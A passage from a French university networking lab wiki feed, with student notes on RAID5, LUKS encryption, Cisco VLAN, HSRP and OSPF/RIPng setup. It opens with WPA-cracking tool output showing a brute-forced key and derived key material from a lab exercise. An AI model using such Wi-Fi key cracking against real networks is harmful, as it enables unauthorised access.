      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sdb1'''&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sdb1&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1):&lt;br /&gt;
First sector (2048-1953525167, default 2048):&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size xxxx.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
La clef est prête, on peut desormais crypter avec l'utilitaire cyptsetup &lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb1&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb1 clef_ima2a_G5&lt;br /&gt;
    mkfs.ext4 /dev/mapper/clef_ima2a_G5&lt;br /&gt;
    mount -t ext4 /dev/mapper/clef_ima2a_G5 /mnt/clef&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51396</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51396"/>
				<updated>2019-11-29T11:35:04Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Securisation du DNS : Le DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
